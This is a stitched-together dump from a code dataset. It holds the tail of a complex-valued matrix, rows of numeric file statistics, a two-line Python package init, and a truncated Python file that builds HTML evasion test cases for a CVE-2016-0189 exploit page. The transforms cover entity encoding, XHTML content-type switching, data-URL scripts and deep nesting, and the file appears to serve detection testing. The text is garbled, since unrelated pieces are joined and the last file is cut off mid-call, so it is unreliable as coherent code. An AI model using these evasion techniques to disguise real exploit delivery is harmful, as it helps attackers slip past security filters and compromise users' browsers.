0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]])
}
| 126.26633
| 343
| 0.187971
| 65,586
| 349,884
| 1.002714
| 0.000686
| 0.664102
| 0.984885
| 1.31318
| 0.997004
| 0.997004
| 0.997004
| 0.997004
| 0.997004
| 0.997004
| 0
| 0.28431
| 0.560706
| 349,884
| 2,770
| 344
| 126.311913
| 0.143557
| 0.000506
| 0
| 0.992397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.000362
| 0
| 0.000362
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
07a9cd0be9dbbba103762215a4490d7713660b36
| 48
|
py
|
Python
|
aspire/__init__.py
|
Constructionware/aspireAPI
|
b558fa2f3971698f2784d8b03e1241f282a1df0b
|
[
"MIT"
] | 1
|
2022-01-20T04:15:27.000Z
|
2022-01-20T04:15:27.000Z
|
aspire/__init__.py
|
Constructionware/aspire
|
b558fa2f3971698f2784d8b03e1241f282a1df0b
|
[
"MIT"
] | null | null | null |
aspire/__init__.py
|
Constructionware/aspire
|
b558fa2f3971698f2784d8b03e1241f282a1df0b
|
[
"MIT"
] | null | null | null |
from aspire.web import *
from aspire import ext
| 16
| 24
| 0.791667
| 8
| 48
| 4.75
| 0.625
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 48
| 2
| 25
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
07c62dd260d75dfb77366f10960ec1045a6ea977
| 55,069
|
py
|
Python
|
sets/1/cases/HtmlEvasion/cve_2016_0189_v2.py
|
CreatePhotonW/HtmlmthCases
|
e9140c56f14b24eb011f3283e6e946ead95ce75f
|
[
"MIT"
] | null | null | null |
sets/1/cases/HtmlEvasion/cve_2016_0189_v2.py
|
CreatePhotonW/HtmlmthCases
|
e9140c56f14b24eb011f3283e6e946ead95ce75f
|
[
"MIT"
] | null | null | null |
sets/1/cases/HtmlEvasion/cve_2016_0189_v2.py
|
CreatePhotonW/HtmlmthCases
|
e9140c56f14b24eb011f3283e6e946ead95ce75f
|
[
"MIT"
] | 1
|
2021-02-05T17:29:04.000Z
|
2021-02-05T17:29:04.000Z
|
from collections import deque, OrderedDict
from utils import TransformFunction
import evasions.html
def get_cases(long_descriptions=False):
cases = []
# singles/minimums
# html based evasions
cases.append(TransformFunction("HtmlEvasion-null-001", None, evasions.html.null))
cases.append(TransformFunction("HtmlEvasion-html-001", None, evasions.html.remove_html_comments))
cases.append(TransformFunction("HtmlEvasion-html-002", None, evasions.html.pad_body_with_div)) # horizontal
cases.append(TransformFunction("HtmlEvasion-html-003", None, evasions.html.move_body_to_nested_div)) # vertical
cases.append(TransformFunction("HtmlEvasion-html-004", None, evasions.html.move_body_to_nested_div_pad_children_in_last_one)) # vertical then horizontal
cases.append(TransformFunction("HtmlEvasion-html-005", None, evasions.html.move_body_to_nested_div_with_children.parameterize(N=1041, M=1000000))) # vertical then tree
cases.append(TransformFunction("HtmlEvasion-html-006", None, evasions.html.xua_meta_change_value_8))
cases.append(TransformFunction("HtmlEvasion-html-007", None, evasions.html.xua_meta_change_value_8, evasions.html.script_language_add_encode))
cases.append(TransformFunction("HtmlEvasion-html-008", None, evasions.html.xua_meta_change_value_8, evasions.html.script_language_add_encode, evasions.html.encoded_script))
cases.append(TransformFunction("HtmlEvasion-html-009", None, evasions.html.insert_slash_after_opening_tag_names))
cases.append(TransformFunction("HtmlEvasion-html-010", None, evasions.html.insert_many_slash_after_html_opening_tag_name))
cases.append(TransformFunction("HtmlEvasion-html-011", None, evasions.html.insert_many_slash_after_opening_tag_names.parameterize(N=783)))
cases.append(TransformFunction("HtmlEvasion-html-012", None, evasions.html.attributes_reverse))
cases.append(TransformFunction("HtmlEvasion-html-013", None, evasions.html.attributes_insert_newlines))
cases.append(TransformFunction("HtmlEvasion-html-014", None, evasions.html.attributes_insert_many_newlines.parameterize(multiplier=30)))
cases.append(TransformFunction("HtmlEvasion-html-015", None, evasions.html.entity_encoding_attributes_hex))
cases.append(TransformFunction("HtmlEvasion-html-016", None, evasions.html.entity_encoding_attributes_dec))
cases.append(TransformFunction("HtmlEvasion-html-017", None, evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-018", None, evasions.html.remove_content_type_http_equiv_meta))
cases.append(TransformFunction("HtmlEvasion-html-019", None, evasions.html.xua_move_meta_to_headers))
cases.append(TransformFunction("HtmlEvasion-html-020", None, evasions.html.external_resource_internal_script))
cases.append(TransformFunction("HtmlEvasion-html-021", None, evasions.html.data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data))
cases.append(TransformFunction("HtmlEvasion-html-022", None, evasions.html.data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data_min))
cases.append(TransformFunction("HtmlEvasion-html-023", None, evasions.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data))
cases.append(TransformFunction("HtmlEvasion-html-024", None, evasions.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data_no))
cases.append(TransformFunction("HtmlEvasion-html-025", None, evasions.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_url))
cases.append(TransformFunction("HtmlEvasion-html-026", None, evasions.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data))
cases.append(TransformFunction("HtmlEvasion-html-027", None, evasions.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data_no))
cases.append(TransformFunction("HtmlEvasion-html-028", None, evasions.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_url))
# Content-Type based evasions
cases.append(TransformFunction("HtmlEvasion-html-100", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_no_type))
cases.append(TransformFunction("HtmlEvasion-html-101", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-102", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-103", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-104", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-105", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-106", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_no_type_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-107", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_text_html_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-108", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-109", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-110", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-111", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-112", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_no_type))
cases.append(TransformFunction("HtmlEvasion-html-113", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-114", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-115", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-116", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-117", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-118", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_no_type_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-119", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_text_html_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-120", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-121", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-122", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-123", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-124", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_no_type))
cases.append(TransformFunction("HtmlEvasion-html-125", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-126", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-127", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-128", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-129", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-130", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_no_type_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-131", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_text_html_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-132", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-133", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-134", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-135", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_image_svg_xml))
# End Content-Type based evasions
##### xml based evasions
# mix of singles and combos
parsed_as_xml_case = TransformFunction("", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_text_xml)
cases.append(TransformFunction("HtmlEvasion-html-200", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_dec))
cases.append(TransformFunction("HtmlEvasion-html-201", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_hex))
cases.append(TransformFunction("HtmlEvasion-html-202", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-203", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-204", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-205", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_dec))
cases.append(TransformFunction("HtmlEvasion-html-206", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_hex))
cases.append(TransformFunction("HtmlEvasion-html-207", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_mix))
cases.append(TransformFunction("HtmlEvasion-html-208", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_cdata))
cases.append(TransformFunction("HtmlEvasion-html-209", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-210", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-211", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_mix,
evasions.html.entity_encoding_cdata_mix))
cases.append(TransformFunction("HtmlEvasion-html-212", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-213", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-214", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-215", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-216", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-217", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-200", None, parsed_as_xml_case, evasions.html.entity_encoding_attributes_internal_entities, evasions.html.entity_encoding_cdata_internal_entities, evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity)) # crashes IE
cases.append(TransformFunction("HtmlEvasion-html-218", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-219", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity,
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities))
cases.append(TransformFunction("HtmlEvasion-html-220", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-221", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-222", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-223", None, parsed_as_xml_case,
